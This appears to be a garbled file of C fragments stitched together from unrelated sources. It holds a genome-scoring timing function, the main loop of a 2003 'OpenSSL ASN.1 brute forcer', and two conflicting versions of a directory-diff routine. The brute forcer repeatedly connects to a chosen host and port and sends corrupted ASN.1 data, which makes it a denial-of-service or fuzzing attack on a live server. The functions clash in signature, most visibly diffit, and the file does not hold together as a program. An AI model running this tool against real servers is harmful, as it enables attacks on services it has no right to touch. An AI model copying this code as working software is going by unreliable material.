/* Evaluate a genome and set its score. */
static void eval(struct genome_st *g)
{
int to1, to2;
unsigned d1, d2;
struct timeval t0, t1, t2, t3;
/* Measure how much time we waited until the idle system
* and the time it take the application loading animation
* to be commenced after the click. */
gettimeofday(&t0, NULL);
to1 = waitidle(g->window, g->threshold, TIMEOUT);
gettimeofday(&t1, NULL);
click(150, 200);
gettimeofday(&t2, NULL);
to2 = waitdbus(30);
gettimeofday(&t3, NULL);
/* Calculate the score and note the results. */
d1 = diffit(&t1, &t0);
d2 = diffit(&t3, &t2);
g->score = d1 + d2;
printf( "window=%u, threshold=%f, t1=%u%s, t2=%u%s, score=%u\n",
g->window, g->threshold,
d1, to1 ? "" : " [timeout]",
d2, to2 ? "" : " [timeout]",
g->score);
} /* eval */
int main(int argc, char *argv[])
{
struct sockaddr_in addr;
int s, port = 0, first = 1, len;
char *host = NULL;
unsigned int seed;
struct timeval tv;
printf("OpenSSL ASN.1 brute forcer (Syzop/2003)\n\n");
if (argc != 3) {
fprintf(stderr, "Use: %s [ip] [port]\n", argv[0]);
exit(1);
}
host = argv[1];
port = atoi(argv[2]);
if ((port < 1) || (port > 65535)) {
fprintf(stderr, "Port out of range (%d)\n", port);
exit(1);
}
gettimeofday(&tv, NULL);
seed = (getpid() ^ tv.tv_sec) + (tv.tv_usec * 1000);
printf("seed = %u\n", seed);
srand(seed);
memset(&addr, 0, sizeof(addr));
signal(SIGPIPE, SIG_IGN); /* Ignore SIGPIPE */
while(1)
{
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
fprintf(stderr, "Socket error: %s\n", strerror(errno));
exit(EXIT_FAILURE);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(host);
if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
fprintf(stderr, "Unable to connect: %s\n", strerror(errno));
if (!first)
diffit();
exit(EXIT_FAILURE);
}
first = 0;
printf("."); fflush(stdout);
len = send_hello();
write(s, buf, len);
len = send_crap();
corruptor(buf, len);
write(s, buf, len);
usleep(1000); /* wait.. */
close(s);
}
exit(EXIT_SUCCESS);
}
/*
* Diff directory traversal. Will be called recursively if -r was specified.
*/
void
diffdir(char *p1, char *p2, int flags)
{
struct dirent *dent1, **dp1, **edp1, **dirp1 = NULL;
struct dirent *dent2, **dp2, **edp2, **dirp2 = NULL;
size_t dirlen1, dirlen2;
char path1[MAXPATHLEN], path2[MAXPATHLEN];
int pos;
dirlen1 = strlcpy(path1, *p1 ? p1 : ".", sizeof(path1));
if (dirlen1 >= sizeof(path1) - 1) {
warnx("%s: %s", p1, strerror(ENAMETOOLONG));
status = 2;
return;
}
if (path1[dirlen1 - 1] != '/') {
path1[dirlen1++] = '/';
path1[dirlen1] = '\0';
}
dirlen2 = strlcpy(path2, *p2 ? p2 : ".", sizeof(path2));
if (dirlen2 >= sizeof(path2) - 1) {
warnx("%s: %s", p2, strerror(ENAMETOOLONG));
status = 2;
return;
}
if (path2[dirlen2 - 1] != '/') {
path2[dirlen2++] = '/';
path2[dirlen2] = '\0';
}
/*
* Get a list of entries in each directory, skipping "excluded" files
* and sorting alphabetically.
*/
pos = scandir(path1, &dirp1, selectfile, alphasort);
if (pos == -1) {
if (errno == ENOENT && (Nflag || Pflag)) {
pos = 0;
} else {
warn("%s", path1);
goto closem;
}
}
dp1 = dirp1;
edp1 = dirp1 + pos;
pos = scandir(path2, &dirp2, selectfile, alphasort);
if (pos == -1) {
if (errno == ENOENT && Nflag) {
pos = 0;
} else {
warn("%s", path2);
goto closem;
}
}
dp2 = dirp2;
edp2 = dirp2 + pos;
/*
* If we were given a starting point, find it.
*/
if (start != NULL) {
while (dp1 != edp1 && strcmp((*dp1)->d_name, start) < 0)
dp1++;
while (dp2 != edp2 && strcmp((*dp2)->d_name, start) < 0)
dp2++;
}
/*
* Iterate through the two directory lists, diffing as we go.
*/
while (dp1 != edp1 || dp2 != edp2) {
dent1 = dp1 != edp1 ? *dp1 : NULL;
dent2 = dp2 != edp2 ? *dp2 : NULL;
pos = dent1 == NULL ? 1 : dent2 == NULL ? -1 :
strcmp(dent1->d_name, dent2->d_name);
if (pos == 0) {
/* file exists in both dirs, diff it */
diffit(dent1, path1, dirlen1, path2, dirlen2, flags);
dp1++;
dp2++;
} else if (pos < 0) {
/* file only in first dir, only diff if -N */
if (Nflag)
diffit(dent1, path1, dirlen1, path2, dirlen2,
flags);
else if (lflag)
dent1->d_status |= D_ONLY;
else
print_only(path1, dirlen1, dent1->d_name);
dp1++;
} else {
/* file only in second dir, only diff if -N or -P */
if (Nflag || Pflag)
diffit(dent2, path1, dirlen1, path2, dirlen2,
flags);
else if (lflag)
dent2->d_status |= D_ONLY;
else
print_only(path2, dirlen2, dent2->d_name);
dp2++;
}
}
if (lflag) {
path1[dirlen1] = '\0';
path2[dirlen2] = '\0';
for (dp1 = dirp1; (dent1 = *dp1) != NULL; dp1++) {
print_status(dent1->d_status, path1, path2,
dent1->d_name);
}
for (dp2 = dirp2; (dent2 = *dp2) != NULL; dp2++) {
if (dent2->d_status == D_ONLY)
print_status(dent2->d_status, path2, NULL,
dent2->d_name);
}
}
closem:
if (dirp1 != NULL) {
for (dp1 = dirp1; dp1 < edp1; dp1++)
xfree(*dp1);
xfree(dirp1);
}
if (dirp2 != NULL) {
for (dp2 = dirp2; dp2 < edp2; dp2++)
xfree(*dp2);
xfree(dirp2);
}
}
/*
* Diff directory traversal. Will be called recursively if -r was specified.
*/
void
diffdir(char *p1, char *p2, int flags)
{
struct diffdirent **dirp1, **dirp2, **dp1, **dp2;
struct diffdirent *dent1, *dent2;
size_t dirlen1, dirlen2;
char path1[MAXPATHLEN], path2[MAXPATHLEN];
char *dirbuf1, *dirbuf2;
int pos;
dirlen1 = strlcpy(path1, *p1 ? p1 : ".", sizeof(path1));
if (dirlen1 >= sizeof(path1) - 1) {
warnx("%s: %s", p1, strerror(ENAMETOOLONG));
status = 2;
return;
}
if (path1[dirlen1 - 1] != '/') {
path1[dirlen1++] = '/';
path1[dirlen1] = '\0';
}
dirlen2 = strlcpy(path2, *p2 ? p2 : ".", sizeof(path2));
if (dirlen2 >= sizeof(path2) - 1) {
warnx("%s: %s", p2, strerror(ENAMETOOLONG));
status = 2;
return;
}
if (path2[dirlen2 - 1] != '/') {
path2[dirlen2++] = '/';
path2[dirlen2] = '\0';
}
/* get a list of the entries in each directory */
dp1 = dirp1 = slurpdir(path1, &dirbuf1, Nflag + Pflag);
dp2 = dirp2 = slurpdir(path2, &dirbuf2, Nflag);
if (dirp1 == NULL || dirp2 == NULL)
return;
/*
* If we were given a starting point, find it.
*/
if (start != NULL) {
while (*dp1 != NULL && strcmp((*dp1)->d_name, start) < 0)
dp1++;
while (*dp2 != NULL && strcmp((*dp2)->d_name, start) < 0)
dp2++;
}
/*
* Iterate through the two directory lists, diffing as we go.
*/
while (*dp1 != NULL || *dp2 != NULL) {
dent1 = *dp1;
dent2 = *dp2;
pos = dent1 == NULL ? 1 : dent2 == NULL ? -1 :
strcmp(dent1->d_name, dent2->d_name);
if (pos == 0) {
/* file exists in both dirs, diff it */
diffit(dent1, path1, dirlen1, path2, dirlen2, flags);
dp1++;
dp2++;
} else if (pos < 0) {
/* file only in first dir, only diff if -N */
if (Nflag)
diffit(dent1, path1, dirlen1, path2, dirlen2,
flags);
else if (lflag)
dent1->d_status |= D_ONLY;
else
print_only(path1, dirlen1, dent1->d_name);
dp1++;
} else {
/* file only in second dir, only diff if -N or -P */
if (Nflag || Pflag)
diffit(dent2, path1, dirlen1, path2, dirlen2,
flags);
else if (lflag)
dent2->d_status |= D_ONLY;
else
print_only(path2, dirlen2, dent2->d_name);
dp2++;
}
}
if (lflag) {
path1[dirlen1] = '\0';
path2[dirlen2] = '\0';
for (dp1 = dirp1; (dent1 = *dp1) != NULL; dp1++) {
print_status(dent1->d_status, path1, path2,
dent1->d_name);
}
for (dp2 = dirp2; (dent2 = *dp2) != NULL; dp2++) {
if (dent2->d_status == D_ONLY)
print_status(dent2->d_status, path2, NULL,
dent2->d_name);
}
}
if (dirbuf1 != NULL) {
xfree(dirp1);
xfree(dirbuf1);
}
if (dirbuf2 != NULL) {
xfree(dirp2);
xfree(dirbuf2);
}
}
